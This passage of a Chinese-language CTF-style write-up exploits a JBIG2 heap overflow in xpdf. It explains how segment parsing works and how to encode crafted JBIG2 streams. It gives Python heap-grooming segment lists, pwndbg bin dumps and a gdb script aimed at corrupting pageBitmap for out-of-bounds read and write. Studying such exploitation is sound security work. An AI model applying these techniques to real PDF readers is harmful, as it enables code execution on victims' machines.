                                    sdATX, sdATY, 0);
            }

            ++i;
        }

        // read the collective bitmap
        if (huff && !refAgg) [...]
    }
    // 创建了一个 symbolDict 结构体
    // create the symbol dict object
    symbolDict = new JBIG2SymbolDict(segNum, numExSyms);

    // 将上面创建的 bitmaps 数组复制进 symbolDict 结构体中
    // exported symbol list
    i = j = 0;
    ex = gFalse;
    prevRun = 1;
    while (i < numInputSyms + numNewSyms)
    {
        if (huff)
            [...]
        else
        {
            arithDecoder->decodeInt(&run, iaexStats);
        }
        [...]
        if (ex)
        {
            for (cnt = 0; cnt < run; ++cnt)
            {
                // 将上面创建的 bitmaps 对等深拷贝进 symbolDict 中
                symbolDict->setBitmap(j++, bitmaps[i++]->copy());
            }
        }
        else
        {
            i += run;
        }
        ex = !ex;
        prevRun = run;
    }
    [...] // 释放 bitmaps 数组
    // store the new symbol dict
    segments->append(symbolDict);
    [...]
}

c. PageInfoSeg

对于每个 Page 来说，需要有一个 Bitmap 来表示当前页面渲染的数据。而在解析 PageInfoSeg 时，程序会创建一个流内全局 Bitmap：pageBitmap。

void JBIG2Stream::readPageInfoSeg(Guint length)
{
    Guint xRes, yRes, flags, striping;

    if (!readULong(&pageW) || !readULong(&pageH) ||
        !readULong(&xRes) || !readULong(&yRes) ||
        !readUByte(&flags) || !readUWord(&striping))
    {
        goto eofError;
    }
    [...]
    // 创建流内全局字段 pageBitmap
    pageBitmap = new JBIG2Bitmap(0, pageW, curPageH);

    // default pixel value
    [...]

    return;

eofError:
    error(errSyntaxError, getPos(), "Unexpected EOF in JBIG2 stream");
}

需要注意的是，pageBitmap 很关键，它表示了一个 Page 的 bitmap。我们将使用堆溢出来覆写 pageBitmap 的 Width 和 Height，进而达到越界读写的目的。

同时 PageInfoSeg 还可用于绕过一个 sanity check，下文中会提到。

d. GenericRegionSeg

GenericRegionSeg 的解析将会从流中读取一个 Bitmap，并与当前的 pageBitmap 的特定区域进行运算：

需要注意的是，JBIG2Globals Stream 中的 Segment 不允许引用任何 Segment，因此 GenericRegionSeg 不能存放在 JBIG2Globals 流中。

void JBIG2Stream::readGenericRegionSeg(Guint segNum, GBool imm,
                                       GBool lossless, Guint length)
{
    [...]
    // read the bitmap
    bitmap = readGenericBitmap(mmr, w, h, templ, tpgdOn, gFalse,
                               NULL, atx, aty, mmr ? length - 18 : 0);

    // combine the region bitmap into the page bitmap
    if (imm)
    {
        if (pageH == 0xffffffff && y + h > curPageH)
        {
            pageBitmap->expand(y + h, pageDefPixel);
        }
        pageBitmap->combine(bitmap, x, y, extCombOp);
        delete bitmap;

        // store the region bitmap
    }
    [...]
}

其中，从流中读取 Bitmap 的操作位于 readGenericBitmap 函数中，读取的操作需要使用到编码器。

而与 pageBitmap 的运算主要是使用 JBIG2Bitmap::combine 方法，该方法中有五种运算方式，分别是 与、或、异或和替换：

switch (combOp)
{
    case 0: // or
        dest |= src1 & m2;
        break;
    case 1: // and
        dest &= src1 | m1;
        break;
    case 2: // xor
        dest ^= src1 & m2;
        break;
    case 3: // xnor
        dest ^= (src1 ^ 0xff) & m2;
        break;
    case 4: // replace
        dest = (src1 & m2) | (dest & m1);
        break;
}

我们可以将外部的立即数，通过利用该段的解析过程，将其传入 pageBitmap 中等待进一步的运算。

e. GenericRefinementRegionSeg

GenericRefinementRegionSeg 的解析过程，组合起来可以对 pageBitmap 上的部分数据进行位运算。我们可以利用这里的位运算来构建加法器：

void JBIG2Stream::readGenericRefinementRegionSeg(Guint segNum, GBool imm,
                                                 GBool lossless, Guint length,
                                                 Guint *refSegs,
                                                 Guint nRefSegs)
{
    [...]
    if (nRefSegs == 1)
    {
        if (!(seg = findSegment(refSegs[0])) ||
            seg->getType() != jbig2SegBitmap)
        {
            error(errSyntaxError, getPos(),
                  "Bad bitmap reference in JBIG2 generic refinement segment");
            return;
        }
        refBitmap = (JBIG2Bitmap *)seg;
    }
    else
    {
        refBitmap = pageBitmap->getSlice(x, y, w, h);
    }
    [...]
    // read
    bitmap = readGenericRefinementRegion(w, h, templ, tpgrOn,
                                         refBitmap, 0, 0, atx, aty);

    // combine the region bitmap into the page bitmap
    if (imm)
    {
        pageBitmap->combine(bitmap, x, y, extCombOp);
        delete bitmap;

        // store the region bitmap
    }
    else
    {
        bitmap->setSegNum(segNum);
        segments->append(bitmap);
    }
    [...]
}

当 GenericRefinementRegionSeg 不引用任何段时，变量 nRefSegs 为 0，此时 refBitmap 为 pageBitmap 上指定 x、y、w、h 属性的一块数据空间。
由于函数 readGenericRefinementRegion 只会受到 refBitmap 的影响，因此我们可以认定传出的bitmap 变量等价于 pageBitmap 上特定区域的数据。
接下来，若我们指定 imm 为 false，那么这块等价于 pageBitmap 上特定区域的数据，将被存储进 segments 数组中。
若下一次解析 GenericRefinementRegionSeg 时引用了第一步创建的段，那么此时 refBitmap 为第一步创建的 Bitmap。这样当 imm 为 true 时，第一步创建的 Bitmap 将会和 pageBitmap 上指定的位置进行 combine 操作，即位运算。
由于第一步创建的 bitmap 是和 pageBitmap 相关，因此整个过程就等价于
- 从 pageBitmap 上特定位置1取下一块数据，并保存至 segments 上
- 从 segments 上取下这块数据，并将其与 pageBitmap 上特定位置2进行位运算。
1
2
3
4
5
6
7
8
+----------------------> x-axis
|
| .(2)
|
| .(1)
|
V
y-axis

如此，便达到了让 pageBitmap 上指定两个位置的数据进行位运算的操作。我们将使用该操作来一步步构建位运算原语、乃至加法器。

f. TextRegionSeg

TextRegionSeg 可以引用指定的 SymbolDictSeg，并对其中的任意 instance 进行操作。

需要注意的是，JBIG2Globals Stream 中的 Segment 不允许引用任何 Segment，因此 TextRegionSeg 不能存放在 JBIG2Globals 流中。

整体流程大致如下：

void JBIG2Stream::readTextRegionSeg(Guint segNum, GBool imm,
                                    GBool lossless, Guint length,
                                    Guint *refSegs, Guint nRefSegs)
{
    [...]
    // get the symbol bitmaps
    // 从所引用的每个段上，将每个 instance 拷贝到 syms 数组中
    syms = (JBIG2Bitmap **)gmallocn(numSyms, sizeof(JBIG2Bitmap *));
    kk = 0;
    for (i = 0; i < nRefSegs; ++i)
    {
        if ((seg = findSegment(refSegs[i])))
        {
            if (seg->getType() == jbig2SegSymbolDict)
            {
                symbolDict = (JBIG2SymbolDict *)seg;
                for (k = 0; k < symbolDict->getSize(); ++k)
                {
                    syms[kk++] = symbolDict->getBitmap(k);
                }
            }
        }
    }
    [...]
    // 执行 readTextRegion 函数，将指定的 syms 与新创建出来的 bitmap 进行 combine 操作
    bitmap = readTextRegion(huff, refine, w, h, numInstances,
                            logStrips, numSyms, symCodeTab, symCodeLen, syms,
                            defPixel, combOp, transposed, refCorner, sOffset,
                            huffFSTable, huffDSTable, huffDTTable,
                            huffRDWTable, huffRDHTable,
                            huffRDXTable, huffRDYTable, huffRSizeTable,
                            templ, atx, aty);

    gfree(syms);

    // combine the region bitmap into the page bitmap
    // 将当前 bitmap 与 pageBitmap 进行 combine 操作，传递所引用的 instance 上的值至 pageBitmap 上
    if (imm)
    {
        if (pageH == 0xffffffff && y + h > curPageH)
        {
            pageBitmap->expand(y + h, pageDefPixel);
        }
        pageBitmap->combine(bitmap, x, y, extCombOp);
        delete bitmap;

        // store the region bitmap
    }
    else
    {
        bitmap->setSegNum(segNum);
        segments->append(bitmap);
    }
    [...]
}

3. JBIG2Encode

a. encode Bitmap

通过阅读上面关于 Segments 的源代码，我们可以很容易的得知：在诸如 readGenericBitmap 等读入 bitmap 的函数中，hso 会尝试从外部 JBIG2Stream 流中，使用某种解码器来对读入的 bitmap 进行解码（例如代码中多次出现 arithDecoder->decodeInt 等调用）。

因此，作为提供外部 JBIG2Stream 流的我们，需要对写入至 pdf 中的 bitmap 做对应的编码操作。

从最上面的 JBIG2Stream::reset 函数中可以得知，一共由三种解码器：

JArithmeticDecoder
JBIG2HuffmanDecoder
JBIG2MMRDecoder

而这些解码器的内部算法，如果要让我们徒手撸一个的话，那么做题效率就会非常低。因此，我们可以使用 jbig2enc 库来帮助我们完成数据编码操作，该库已经实现了 JArithmeticDecoder 状态机的编码算法，故我们无需了解内部细节即可完成对 bitmap 的编码过程。

1	git clone git@github.com:agl/jbig2enc.git

但是，该库是使用 C++ 编写的，若 exploit 也全部使用 C++ 完成，则工作量较高。因此，我们可以使用 pybind11 来暴露 jbig2enc 中的部分接口给 python，这样编写 exploit 时可以使用 python 语言来完成。

1	sudo apt-get install pybind11-dev

最后需要注意的是，由于 jbig2enc 的接口会使用到大量的指针，而将指针暴露给 python 接口调用是一个非常不明智的选择（因为如果让 python 来调用需要指针的接口，则会降低开发速度和提高触发 bug 的几率），因此我们最好根据当前的需求，即：

将 bitmap 数据以 JArithmeticDecoder 方式来进行编码。

来额外编写一个 wrapper C++ 代码，实现三个封装好的结构体/枚举：

ArithEncoder：调用 jbig2enc 对 bitmap 进行编码的类
Bitmap：待被编码的 bitmap 数据
ArithEncoder::Proc：ArithEncoder 编码器的状态枚举

最后将这三个结构体/枚举暴露给 python 调用，避免让 python 直接操作指针。

这一小节所实现的代码，正对应于 exp 中的以下几个文件：
hso-groupie/exploit/jbig2arith.[cc,h]
hso-groupie/exploit/jbjbarith.[cc,h]

b. encode segments

hso 在 read segments 时，首先会读取出每个当前 segment 的段号 segNum、segFlags、refFlags 等一系列字段和标志，之后才是进行（可能的） bitmap 读取。

这些字段和标志同样是需要我们手动放进 JBIG2Stream 中。由于这里的字段和标志不需要使用解码器进行解码，因此可以手动编写代码将字段一个个放置进流中。

这一步的操作位于 exp 中的 hso-groupie/exploit/jbig2.py ，该脚本为所有用到的 segment 都编写了一个对应的 python 结构转 JBIG2Stream 字节流的操作；同时，上一节中暴露给 python 所调用的 bitmap encoder 接口，也是在该脚本中所使用。

这样，当我们使用 python 设计好一个个特定的 segments 后，我们便可以将这些 segments 快速转换成 JBIG2Stream 流数据，方便快捷。

五、漏洞利用流程

1. 堆风水

a. 创建堆空洞

先放上这张镇楼图：

为了利用这个堆溢出漏洞，我们需要充分发动堆风水，将指定的结构放至对应的堆块。这里，我们的堆风水需要完成以下几个目标：

让 pdf 在解析 TextRegionSeg 时，其创建的 syms 指针数组位于 undersized syms buffer 处
让内含存放超多指针的 JBIG2SymbolDict 结构体的 segment 放置在 segments GList backing buffer 处
这里，我们打算让 JBIG2SymbolDict 结构体存放至 global segment 中，因为 SymbolDictSegment 不依赖与任何的 Segments，但是后续的 TextRegionSegment 会依赖这些 SymbolDictSegment。
让 pageBitmap 结构体占据图中 JBIG2Bitmap 那块内存，并让其 data 占据图中上面 bitmap backing buffer 那块内存。
通读代码，我们可以得知绝大多数 segments 在解析时，都可以让其 bitmap 与 pageBitmap 进行运算，并将结果保存在 pageBitmap 上。因此让 pageBitmap 拥有越界读写的能力是最好的选择。

我们先尝试在 global segment 中分配三个不同 Bitmap 大小的 SymbolDict 出来。这里分配不同大小的 SymbolDict 是为了后续在 TextRegionSeg 中，排列组合 size 至溢出，因此这三个堆块的位置不需要关心：

# global segment
global_file = [
    SymbolDict(0, [Bitmap(1, 1)] * 0x10000),
    SymbolDict(1, [Bitmap(1, 1)] * (size_to_overflow // 8)),
    SymbolDict(2, [Bitmap(1, 1)]),
]

其中 size_to_overflow 为上图中 overflow 的字节数，具体计算过程稍后介绍。

此时我们看看分配完这三个 SymbolDict 后的 bins 是什么情况，可以看到有大量的碎片堆块：

pwndbg> bins
tcachebins
0x20 [  4]: 0x55555579f8e0 —▸ 0x5555557b9550 —▸ 0x5555557b0c10 —▸ 0x5555557b0c60 ◂— 0x0
0x30 [  5]: 0x5555557ab330 —▸ 0x5555557b0c30 —▸ 0x5555557b0c80 —▸ 0x555555799280 —▸ 0x5555557992d0 ◂— 0x0
0x40 [  7]: 0x5555557f7f90 —▸ 0x5555557f8f10 —▸ 0x5555557f9100 —▸ 0x5555557f7bb0 —▸ 0x5555557fe710 —▸ 0x5555557a0320 —▸ 0x555555797210 ◂— 0x0
0x50 [  1]: 0x5555557a02b0 ◂— 0x0
0x60 [  4]: 0x5555557ab3c0 —▸ 0x5555557a9e40 —▸ 0x5555557ab890 —▸ 0x5555557ab790 ◂— 0x0
0x70 [  1]: 0x5555557ac760 ◂— 0x0
0x90 [  1]: 0x5555557b94c0 ◂— 0x0
0xa0 [  3]: 0x555555798e00 —▸ 0x5555557b6930 —▸ 0x5555557b6a10 ◂— 0x0
0xb0 [  2]: 0x5555557ba520 —▸ 0x5555557b9410 ◂— 0x0
0xc0 [  3]: 0x5555557bec00 —▸ 0x5555557bf620 —▸ 0x5555557b1220 ◂— 0x0
0xd0 [  5]: 0x555555799ec0 —▸ 0x5555557b0cb0 —▸ 0x5555557c5400 —▸ 0x5555557c37f0 —▸ 0x5555557bfcf0 ◂— 0x0
0xe0 [  3]: 0x5555557be4b0 —▸ 0x5555557a9a30 —▸ 0x5555557bc750 ◂— 0x0
0xf0 [  3]: 0x5555557c6d30 —▸ 0x5555557bd370 —▸ 0x5555557bd4a0 ◂— 0x0
0x100 [  2]: 0x5555557c4360 —▸ 0x5555557c44a0 ◂— 0x0
0x110 [  1]: 0x555555797100 ◂— 0x0
0x120 [  2]: 0x5555557c1000 —▸ 0x5555557c5880 ◂— 0x0
0x140 [  3]: 0x5555557c7c80 —▸ 0x5555557c7430 —▸ 0x5555557cc180 ◂— 0x0
0x150 [  3]: 0x5555557cdac0 —▸ 0x5555557c83f0 —▸ 0x5555557c8590 ◂— 0x0
0x160 [  2]: 0x55555579fc00 —▸ 0x5555557a4420 ◂— 0x0
0x170 [  3]: 0x555555797c20 —▸ 0x5555557d36c0 —▸ 0x5555557d3550 ◂— 0x0
0x180 [  2]: 0x5555557bff50 —▸ 0x5555557d8010 ◂— 0x0
0x190 [  7]: 0x5555557adb80 —▸ 0x5555557d8530 —▸ 0x5555557ad570 —▸ 0x5555557ac7d0 —▸ 0x5555557a8710 —▸ 0x5555557a8d60 —▸ 0x5555557aad00 ◂— 0x0
0x1a0 [  2]: 0x5555557d2890 —▸ 0x5555557ad700 ◂— 0x0
0x1b0 [  2]: 0x5555557a8ef0 —▸ 0x5555557aea50 ◂— 0x0
0x1c0 [  2]: 0x5555557d1bb0 —▸ 0x55555579ad70 ◂— 0x0
0x1d0 [  2]: 0x555555796b00 —▸ 0x555555796640 ◂— 0x0
0x1f0 [  2]: 0x5555557a6410 —▸ 0x5555557a6220 ◂— 0x0
0x200 [  2]: 0x55555576a670 —▸ 0x5555557aae90 ◂— 0x0
0x220 [  2]: 0x5555557d8310 —▸ 0x5555557ac960 ◂— 0x0
0x230 [  1]: 0x5555557bd980 ◂— 0x0
0x270 [  1]: 0x5555557ba6d0 ◂— 0x0
0x2b0 [  1]: 0x5555557abdc0 ◂— 0x0
0x2c0 [  1]: 0x555555798320 ◂— 0x0
0x2e0 [  1]: 0x5555557aa730 ◂— 0x0
0x300 [  2]: 0x5555557a5c60 —▸ 0x5555557a9590 ◂— 0x0
0x310 [  7]: 0x5555557ae510 —▸ 0x5555557ac110 —▸ 0x5555557ad010 —▸ 0x5555557abab0 —▸ 0x5555557a9280 —▸ 0x5555557aa420 —▸ 0x5555557a76c0 ◂— 0x0
0x320 [  3]: 0x555555799f90 —▸ 0x5555557becc0 —▸ 0x5555557bab30 ◂— 0x0
0x350 [  2]: 0x5555557bcb40 —▸ 0x5555557c3bd0 ◂— 0x0
0x390 [  1]: 0x5555557a88a0 ◂— 0x0
0x3b0 [  2]: 0x555555797250 —▸ 0x5555557a79d0 ◂— 0x0
0x3c0 [  1]: 0x5555557d39d0 ◂— 0x0
0x3d0 [  1]: 0x5555557cccc0 ◂— 0x0
0x400 [  1]: 0x55555576aa50 ◂— 0x0
0x410 [  3]: 0x555555797810 —▸ 0x5555557bf1d0 —▸ 0x5555557a7f90 ◂— 0x0
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x5555558304b0 —▸ 0x7ffff7ad8c00 (main_arena+96) ◂— 0x5555558304b0
smallbins
0x20: 0x5555557a99e0 —▸ 0x7ffff7ad8c10 (main_arena+112) ◂— 0x5555557a99e0
0xb0: 0x5555557f82f0 —▸ 0x7ffff7ad8ca0 (main_arena+256) ◂— 0x5555557f82f0
0xf0: 0x5555557d0ab0 —▸ 0x7ffff7ad8ce0 (main_arena+320) ◂— 0x5555557d0ab0
0x120: 0x5555557992f0 —▸ 0x7ffff7ad8d10 (main_arena+368) ◂— 0x5555557992f0
0x190: 0x5555557f7df0 —▸ 0x5555557f8d70 —▸ 0x5555557f8f60 —▸ 0x5555557f7a10 —▸ 0x5555557fe570 ◂— ...
0x1c0 [corrupted]
FD: 0x5555557f1a30 —▸ 0x5555557f4780 —▸ 0x5555557d15f0 —▸ 0x5555557e49d0 —▸ 0x55555579ecf0 ◂— ...
BK: 0x5555557d0c90 —▸ 0x5555557d06f0 —▸ 0x5555557d1410 —▸ 0x5555557d0e70 —▸ 0x55555579e390 ◂— ...
0x1d0 [corrupted]
FD: 0x5555557f9910 —▸ 0x5555557f9720 —▸ 0x5555557f85b0 —▸ 0x5555557fe960 —▸ 0x5555557f66b0 ◂— ...
BK: 0x5555557f9530 —▸ 0x5555557f9150 —▸ 0x5555557fb050 —▸ 0x5555557fdd90 —▸ 0x5555557fd1e0 ◂— ...
0x1e0 [corrupted]
FD: 0x5555557a13c0 —▸ 0x5555557a0bc0 —▸ 0x5555557a11c0 —▸ 0x5555557a0570 —▸ 0x5555557a0770 ◂— ...
BK: 0x5555557fcbf0 —▸ 0x5555557fc9f0 —▸ 0x5555557fdb90 —▸ 0x5555557fe760 —▸ 0x5555557fc210 ◂— ...
0x1f0: 0x5555557ba930 —▸ 0x5555557f1120 —▸ 0x5555557d19b0 —▸ 0x5555557befd0 —▸ 0x7ffff7ad8de0 (main_arena+576) ◂— ...
0x200: 0x5555557a9b00 —▸ 0x5555557df570 —▸ 0x5555557a8500 —▸ 0x7ffff7ad8df0 (main_arena+592) ◂— 0x5555557a9b00
0x220 [corrupted]
FD: 0x5555557f3c20 —▸ 0x5555557ecce0 —▸ 0x5555557e8180 —▸ 0x5555557f57f0 —▸ 0x5555557ee5a0 ◂— ...
BK: 0x5555557f4540 —▸ 0x5555557f2130 —▸ 0x5555557f27e0 —▸ 0x5555557eec60 —▸ 0x5555557f2ea0 ◂— ...
0x230 [corrupted]
FD: 0x5555557ae810 —▸ 0x5555557f49d0 —▸ 0x5555557e2710 —▸ 0x5555557f4c20 —▸ 0x5555557a0970 ◂— ...
BK: 0x5555557f0a20 —▸ 0x5555557a23a0 —▸ 0x5555557e5a20 —▸ 0x5555557a3d20 —▸ 0x5555557a3f70 ◂— ...
0x240 [corrupted]
FD: 0x5555557f5590 —▸ 0x5555557f1330 —▸ 0x5555557e3730 —▸ 0x5555557f4e70 —▸ 0x5555557a1ef0 ◂— ...
BK: 0x5555557ec840 —▸ 0x5555557f50d0 —▸ 0x5555557a4660 —▸ 0x5555557e4090 —▸ 0x5555557f5330 ◂— ...
0x250: 0x55555579a760 —▸ 0x7ffff7ad8e40 (main_arena+672) ◂— 0x55555579a760
0x270 [corrupted]
FD: 0x5555557dd3a0 —▸ 0x5555557e1a10 —▸ 0x5555557e0810 —▸ 0x5555557e02e0 —▸ 0x5555557e0aa0 ◂— ...
BK: 0x5555557a54a0 —▸ 0x5555557a5210 —▸ 0x5555557e1f40 —▸ 0x5555557e0aa0 —▸ 0x5555557e02e0 ◂— ...
0x280 [corrupted]
FD: 0x5555557c7560 —▸ 0x5555557b0d70 —▸ 0x5555557e0570 —▸ 0x5555557df2d0 —▸ 0x5555557df810 ◂— ...
BK: 0x5555557e21d0 —▸ 0x5555557deaf0 —▸ 0x5555557df030 —▸ 0x5555557e2470 —▸ 0x5555557ded90 ◂— ...
0x290: 0x5555557acb70 —▸ 0x5555557ddb10 —▸ 0x5555557e0030 —▸ 0x5555557e1760 —▸ 0x5555557de5a0 ◂— ...
0x2a0: 0x5555557dfd70 —▸ 0x5555557dfab0 —▸ 0x7ffff7ad8e90 (main_arena+752) ◂— 0x5555557dfd70
0x2c0: 0x5555557a5f50 —▸ 0x5555557f5c90 —▸ 0x7ffff7ad8eb0 (main_arena+784) ◂— 0x5555557a5f50 /* 'P_zUUU' */
0x340: 0x5555557f5f70 —▸ 0x5555557ac410 —▸ 0x7ffff7ad8f30 (main_arena+912) ◂— 0x5555557f5f70
0x380: 0x5555557c69a0 —▸ 0x7ffff7ad8f70 (main_arena+976) ◂— 0x5555557c69a0
0x390: 0x5555557d7c70 —▸ 0x7ffff7ad8f80 (main_arena+992) ◂— 0x5555557d7c70 /* 'p|}UUU' */
0x3b0: 0x5555557c54c0 —▸ 0x7ffff7ad8fa0 (main_arena+1024) ◂— 0x5555557c54c0
0x3f0: 0x5555557bd580 —▸ 0x7ffff7ad8fe0 (main_arena+1088) ◂— 0x5555557bd580
largebins
0x580: 0x5555557cc2b0 —▸ 0x555555797d80 —▸ 0x7ffff7ad9050 (main_arena+1200) ◂— 0x5555557cc2b0
0x600: 0x5555557c7db0 —▸ 0x7ffff7ad9070 (main_arena+1232) ◂— 0x5555557c7db0
0x640: 0x5555557be580 —▸ 0x7ffff7ad9080 (main_arena+1248) ◂— 0x5555557be580
0x780: 0x5555557ea9f0 —▸ 0x5555557cb9e0 —▸ 0x7ffff7ad90d0 (main_arena+1328) ◂— 0x5555557ea9f0
0x800: 0x5555557985d0 —▸ 0x7ffff7ad90f0 (main_arena+1360) ◂— 0x5555557985d0
0x840: 0x5555557cdc00 —▸ 0x7ffff7ad9100 (main_arena+1376) ◂— 0x5555557cdc00
0x900: 0x5555557bdba0 —▸ 0x7ffff7ad9130 (main_arena+1424) ◂— 0x5555557bdba0
0x940: 0x5555557e77f0 —▸ 0x5555557e9b00 —▸ 0x7ffff7ad9140 (main_arena+1440) ◂— 0x5555557e77f0
0x980: 0x5555557d86b0 —▸ 0x5555557ebea0 —▸ 0x7ffff7ad9150 (main_arena+1456) ◂— 0x5555557d86b0
0x9c0: 0x555555795c40 —▸ 0x7ffff7ad9160 (main_arena+1472) ◂— 0x555555795c40 /* '@\\yUUU' */
0xa00: 0x5555557cd080 —▸ 0x7ffff7ad9170 (main_arena+1488) ◂— 0x5555557cd080
0xa40: 0x555555799440 —▸ 0x5555557d1e40 —▸ 0x7ffff7ad9180 (main_arena+1504) ◂— 0x555555799440
0xac0: 0x5555557e83c0 —▸ 0x5555557e6100 —▸ 0x7ffff7ad91a0 (main_arena+1536) ◂— 0x5555557e83c0
0xb00: 0x5555557d2a20 —▸ 0x7ffff7ad91b0 (main_arena+1552) ◂— 0x5555557d2a20 /* ' *}UUU' */
0xb40: 0x5555557e6c70 —▸ 0x5555557feb50 —▸ 0x7ffff7ad91c0 (main_arena+1568) ◂— 0x5555557e6c70 /* 'pl~UUU' */
0xc40: 0x5555557eb210 —▸ 0x5555557e8ea0 —▸ 0x7ffff7ad9200 (main_arena+1632) ◂— 0x5555557eb210
0xe00: 0x5555557c00c0 —▸ 0x5555557b9630 —▸ 0x5555557c4590 —▸ 0x7ffff7ad9210 (main_arena+1648) ◂— 0x5555557c00c0
0x1400: 0x5555557b5420 —▸ 0x7ffff7ad9240 (main_arena+1696) ◂— 0x5555557b5420 /* ' T{UUU' */
0x1600: 0x5555557ce770 —▸ 0x7ffff7ad9250 (main_arena+1712) ◂— 0x5555557ce770
0x1800: 0x5555557bae40 —▸ 0x7ffff7ad9260 (main_arena+1728) ◂— 0x5555557bae40
0x2600: 0x5555557b6aa0 —▸ 0x5555557c1110 —▸ 0x7ffff7ad92d0 (main_arena+1840) ◂— 0x5555557b6aa0
0x2a00: 0x55555579af20 —▸ 0x7ffff7ad92f0 (main_arena+1872) ◂— 0x55555579af20
0x3000: 0x5555557d3d80 —▸ 0x5555557d9b60 —▸ 0x5555557c88a0 —▸ 0x7ffff7ad9300 (main_arena+1888) ◂— 0x5555557d3d80

这些碎片堆块对于接下来的堆风水是相当不利的，因此需要将其全部分配掉。这里使用的是 PageInfoSeg 来分配内存，因为通读代码可以发现 JBIG2Stream::readPageInfoSeg 函数除了分配一个堆块以外，没有产生其他任何影响：

def DummyAlloc(size):
    return PageInfo(233, w=8, h=size)

global_file = [
    SymbolDict(0, [Bitmap(1, 1)] * 0x10000),
    SymbolDict(1, [Bitmap(1, 1)] * (size_to_overflow // 8)),
    SymbolDict(2, [Bitmap(1, 1)]),
    # Heap grooming: eat every chunk in {tcache,fast,small,large,unsorted} bins
    [[DummyAlloc(size)] * 128 for size in range(0x10, 0x1000, 0x10)],
    [[DummyAlloc(size)] * 16 for size in range(0x1000, 0x10000, 0x100)],
]

分配后的 bin 如下所示，可以看到清爽了不少：

pwndbg> bins
tcachebins
empty
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
0x20 [corrupted]
FD: 0x55555579d9f0 —▸ 0x5555557d2860 —▸ 0x555555798db0 —▸ 0x5555557d7fe0 —▸ 0x5555557d7c30 ◂— ...
BK: 0x5555557f96e0 —▸ 0x5555557f9300 —▸ 0x5555557fb200 —▸ 0x5555557fdf40 —▸ 0x5555557fd390 ◂— ...
largebins
empty

那么接下来的问题是，如何设计堆风水？exploit 给了一个清晰明了的做法：

利用 global segment GList 满则扩增的特性创建堆空洞，进而让其他结构体来占据这些内存空洞，完成堆风水。

什么意思呢？我们看看 GList 的一些类方法：

GList::GList() {
  size = 8;
  data = (void **)gmallocn(size, sizeof(void*));
  length = 0;
  inc = 0;
}

void GList::append(void *p) {
  if (length >= size) {
    expand();
  }
  data[length++] = p;
}

void GList::expand() {
  size += (inc > 0) ? inc : size;
  data = (void **)greallocn(data, size, sizeof(void*));
}

可以看到，初始时 GList size 为 8。当 GList 中元素个数超过容量时，GList 容量将会双倍扩增。也就是说，初始时的 size 为 8，下次扩增后的 size 是 16，再下次扩增后的 size 为 32，再下下次的 size 为 64（单位，个指针）。

扩增所使用的堆函数为 realloc，即当 GList 容量扩增后，原先那个堆块将被释放。同时又因为上面已经将其余全部小堆块全都分配出去了，因此 GList 容量扩增所分配的新堆块，一定来自于 top chunk，这就能保证每次 GList 容量扩张时，新堆块的分配顺序一定是从低地址向高地址分配。

因此尝试让 global segment GList 多次扩展，从 8 扩展至我们所需要的最终大小 64：

代码中的 glist_capacity == 32。个人认为这个数表示的是第几次 append global GList 时会扩充 GList size 至 64。

global_file = [
    SymbolDict(0, [Bitmap(1, 1)] * 0x10000),
    SymbolDict(1, [Bitmap(1, 1)] * (size_to_overflow // 8)),
    SymbolDict(2, [Bitmap(1, 1)]),
    # Heap grooming: eat every chunk in {tcache,fast,small,large,unsorted} bins
    [[DummyAlloc(size)] * 128 for size in range(0x10, 0x1000, 0x10)],
    [[DummyAlloc(size)] * 16 for size in range(0x1000, 0x10000, 0x100)],
    # ------------ 开始尝试堆风水 ------------
    [SymbolDict(i, []) for i in range(3, glist_capacity // 2)],
    # Now most bins are empty, except tcachebin 0x20, 0x50 and small bin 0x20
    # This triggers GList::expand(), 0x80 -> 0x100; allocates from top chunk
    SymbolDict(glist_capacity // 2, []),
    [SymbolDict(i, []) for i in range(glist_capacity // 2 + 1, glist_capacity)],
    # 0x100 -> 0x200, the old chunk should fall in tcache
    SymbolDict(100, []),
]

global segment 的堆风水执行结束后，其堆布局大致如下：

注意 segNum 从 3 开始的 Symbol Dict，其结构体所分配的堆块（chunk size = 0x40）也是直接来自于 top chunk 。

// low address --------------------------------------------
/* 
    一些其他的堆块分配，包括 
    1. size=8 的 global GList backing store
    2. DummyAlloc
    3. SymbolDict0、1、2
    4. ...
*/
SymbolDict3-8;
size=16 的 global GList backing store 堆空洞
SymbolDict9-16;
size=32 的 global GList backing store 堆空洞
SymbolDict17-32;
size=64 的 global GList backing store // 最终的 GList data 堆位置，这里可不是堆空洞
// high address -------------------------------------------

接下来，只需分别

让 pageBitmap backing store 占据 size=16 的 Glist 堆空洞
让解析 TextRegion 时创建的 syms 指针数组占据 size=32 的 Glist 堆空洞

即可完成堆布局。

pageBitmap 的 JBIG2Bitmap 结构体堆位置在下文中将会说明。

最后贴个 gdb script，可以使用该 gdbscript 辅助观察内存布局：

file ../../xpdf-4.03/build/xpdf/pdftohtml
aslr off
set follow-fork-mode parent

b readSymbolDictSeg if segNum==8
commands
    printf "sakura in read symbol 8\n"

    printf "globalSegments addr is:0x%llx\n", segments
    printf "segments GList backing buffer\n"
    p *(GList *)segments
    # tcachebins
    bins
    # c
end
b readSymbolDictSeg if segNum==16
commands
    printf "sakura in read symbol 16\n"

    printf "globalSegments addr is:0x%llx\n", segments
    printf "segments GList backing buffer\n"
    p *(GList *)segments
    # tcachebins
    bins
    # c
end
b readSymbolDictSeg if segNum==100
commands
    printf "sakura in read symbol 32\n"

    printf "globalSegments addr is:0x%llx\n", segments
    printf "segments GList backing buffer\n"
    p *(GList *)segments
    # tcachebins
    bins
    
    tb JBIG2Stream.cc:1481
    commands
        printf "after finish globalSegments addr is:0x%llx\n", segments
        p *(GList *)segments
        # tcachebins
        bins
    end
    # replace finish and print info
    # c
end

b JBIG2Stream.cc:2072 if segNum==102
commands
    printf "sakura in TextRegion to trigger oob\n"
    printf "numSyms after underoverflow is:0x%llx\n", numSyms
    set $oob_syms = $rax
    printf "undersized syms buffer addr is:0x%llx\n", $oob_syms

    printf "globalSegments addr is:0x%llx\n", globalSegments
    printf "segments GList backing buffer\n"
    p *(GList *)globalSegments

    printf "pageBitmap addr is :0x%llx\n", pageBitmap
    p *(JBIG2Bitmap *)pageBitmap
    bins

end

r sploit.pdf output

b. 占据堆空洞

global stream 中的解析操作是为了创建堆空洞，那 main stream 的解析操作就是为了占据堆空洞。

